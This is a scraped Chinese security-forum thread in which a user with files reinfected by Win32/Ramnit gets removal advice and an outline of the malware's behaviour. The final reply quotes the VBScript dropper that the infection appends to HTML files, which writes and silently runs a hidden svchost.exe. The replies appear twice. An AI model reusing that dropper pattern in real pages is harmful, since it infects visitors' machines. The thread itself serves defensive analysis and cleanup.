[求助]中了病毒好恶心重做系统还在会感染在EXE DLL上-软件逆向-看雪-安全社区|安全招聘|kanxue.com

最新回复 (8)
rjsvictor 雪币： 7 活跃值： (13) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	rjsvictor 2 楼只有mbr藏身了，dg恢复mbr，卡巴斯基扫描，如果有关路由器虚拟端口 2016-4-21 13:58 0
Tennn 雪币： 1176 活跃值： (1304) 能力值： ( LV12，RANK：380 ) 在线值：发帖 38 回帖 711 粉丝 64 关注私信	Tennn 5 3 楼哈罗我恰巧前几天分析过好像好像我是说好像你这个病毒。。。。然而我分析的这个病毒把某个服务器弄瘫痪（原因是没装杀软... 我这个是可以被杀软查杀的，因为可以被杀软查杀我也就没发帖子了（貌似很久没发了。。。我这个病毒的流程是：黑客工具->释放病毒（UPX的壳+自建内壳）->自解压并释放一个病毒->启动病毒，注入IE->不断感染能感染的文件,撑死服务器->IE向外连接三个IP地址->工作需要停止分析。 2016-4-21 14:19 0
goddkiller 雪币： 485 活跃值： (113) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 2 关注私信	goddkiller 4 楼中的是 Win32/Ramnit 病毒 b07K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2E0K9h3y4J5L8%4y4G2k6Y4c8Q4x3X3g2U0L8$3#2Q4x3V1k6K6k6h3y4#2M7X3W2@1P5g2)9J5c8Y4m8G2M7Y4c8S2L8q4)9J5c8Y4c8Z5M7X3g2S2N6q4)9J5c8X3g2F1j5%4W2U0L8r3!0H3k6h3c8A6j5g2)9J5c8X3g2F1N6s2u0&6i4K6u0W2j5i4y4H3P5q4)9K6c8V1&6S2L8h3g2Q4x3@1c8i4K9h3^5K6x3W2)9J5c8W2u0S2L8h3&6A6N6l9`.`. 专杀工具下载： 8c4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8S2L8W2)9J5k6h3u0S2K9h3c8#2i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0q4U0x3r3M7I4j5i4b7$3 建议你多跑几次专杀工具！！！ 2016-4-21 15:07 0
影子不寂寞雪币： 6 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 349 粉丝 1 关注私信	影子不寂寞 5 楼有次感染了鬼影病毒也是重装系统没办法，后来把硬盘mbr引导重新修复了一下才弄好。 2016-4-21 19:07 0
zhczf 雪币： 12087 活跃值： (18961) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 427 粉丝 0 关注私信	zhczf 6 楼这么恶心的病毒，杀软还是得安装的 2016-4-21 20:38 0
狂奔的鸡骨架雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 43 粉丝 0 关注私信	狂奔的鸡骨架 7 楼在科锐学习，前几天周末作业刚分析了这个样本，上传一个修复被感染文件的dll和源码。写专杀的话先将IE傀儡进程关闭然后将注册表的开机启动项清除然后全盘文件检查修复。上传的附件： FileRepair.zip （983.89kb，23次下载） 2016-4-22 01:30 0
option 雪币： 8712 活跃值： (3280) 能力值： ( LV2，RANK：10 ) 在线值：发帖 40 回帖 727 粉丝 2 关注私信	option 8 楼都好厉害呀，只会手工呀 2016-4-22 11:31 0
option 雪币： 8712 活跃值： (3280) 能力值： ( LV2，RANK：10 ) 在线值：发帖 40 回帖 727 粉丝 2 关注私信	option 9 楼记事本打开html，从4D5A开始到000000终止，复制，打开WinHex，Edit/Clipboard data/past into new file，对话框中选ASCII Hex，OK，保存为a.dll。这是一个UPX压缩的，故UPX -d。IDA分析吧，看不懂了！ html中脚本的作用就是将文件释放为svchost.exe，并执行吧。 <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = " " exe 文件的内容 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> VBScript不太明白，系统不太熟悉，请高手接着爆料。 2016-4-22 11:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (8)
rjsvictor 雪币： 7 活跃值： (13) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	rjsvictor 2 楼只有mbr藏身了，dg恢复mbr，卡巴斯基扫描，如果有关路由器虚拟端口 2016-4-21 13:58 0
Tennn 雪币： 1176 活跃值： (1304) 能力值： ( LV12，RANK：380 ) 在线值：发帖 38 回帖 711 粉丝 64 关注私信	Tennn 5 3 楼哈罗我恰巧前几天分析过好像好像我是说好像你这个病毒。。。。然而我分析的这个病毒把某个服务器弄瘫痪（原因是没装杀软... 我这个是可以被杀软查杀的，因为可以被杀软查杀我也就没发帖子了（貌似很久没发了。。。我这个病毒的流程是：黑客工具->释放病毒（UPX的壳+自建内壳）->自解压并释放一个病毒->启动病毒，注入IE->不断感染能感染的文件,撑死服务器->IE向外连接三个IP地址->工作需要停止分析。 2016-4-21 14:19 0
goddkiller 雪币： 485 活跃值： (113) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 2 关注私信	goddkiller 4 楼中的是 Win32/Ramnit 病毒 b07K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2E0K9h3y4J5L8%4y4G2k6Y4c8Q4x3X3g2U0L8$3#2Q4x3V1k6K6k6h3y4#2M7X3W2@1P5g2)9J5c8Y4m8G2M7Y4c8S2L8q4)9J5c8Y4c8Z5M7X3g2S2N6q4)9J5c8X3g2F1j5%4W2U0L8r3!0H3k6h3c8A6j5g2)9J5c8X3g2F1N6s2u0&6i4K6u0W2j5i4y4H3P5q4)9K6c8V1&6S2L8h3g2Q4x3@1c8i4K9h3^5K6x3W2)9J5c8W2u0S2L8h3&6A6N6l9`.`. 专杀工具下载： 8c4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8S2L8W2)9J5k6h3u0S2K9h3c8#2i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0q4U0x3r3M7I4j5i4b7$3 建议你多跑几次专杀工具！！！ 2016-4-21 15:07 0
影子不寂寞雪币： 6 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 349 粉丝 1 关注私信	影子不寂寞 5 楼有次感染了鬼影病毒也是重装系统没办法，后来把硬盘mbr引导重新修复了一下才弄好。 2016-4-21 19:07 0
zhczf 雪币： 12087 活跃值： (18961) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 427 粉丝 0 关注私信	zhczf 6 楼这么恶心的病毒，杀软还是得安装的 2016-4-21 20:38 0
狂奔的鸡骨架雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 43 粉丝 0 关注私信	狂奔的鸡骨架 7 楼在科锐学习，前几天周末作业刚分析了这个样本，上传一个修复被感染文件的dll和源码。写专杀的话先将IE傀儡进程关闭然后将注册表的开机启动项清除然后全盘文件检查修复。上传的附件： FileRepair.zip （983.89kb，23次下载） 2016-4-22 01:30 0
option 雪币： 8712 活跃值： (3280) 能力值： ( LV2，RANK：10 ) 在线值：发帖 40 回帖 727 粉丝 2 关注私信	option 8 楼都好厉害呀，只会手工呀 2016-4-22 11:31 0
option 雪币： 8712 活跃值： (3280) 能力值： ( LV2，RANK：10 ) 在线值：发帖 40 回帖 727 粉丝 2 关注私信	option 9 楼记事本打开html，从4D5A开始到000000终止，复制，打开WinHex，Edit/Clipboard data/past into new file，对话框中选ASCII Hex，OK，保存为a.dll。这是一个UPX压缩的，故UPX -d。IDA分析吧，看不懂了！ html中脚本的作用就是将文件释放为svchost.exe，并执行吧。 <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = " " exe 文件的内容 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> VBScript不太明白，系统不太熟悉，请高手接着爆料。 2016-4-22 11:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[求助]中了病毒好恶心 重做系统还在 会感染在EXE DLL上

[求助]中了病毒好恶心重做系统还在会感染在EXE DLL上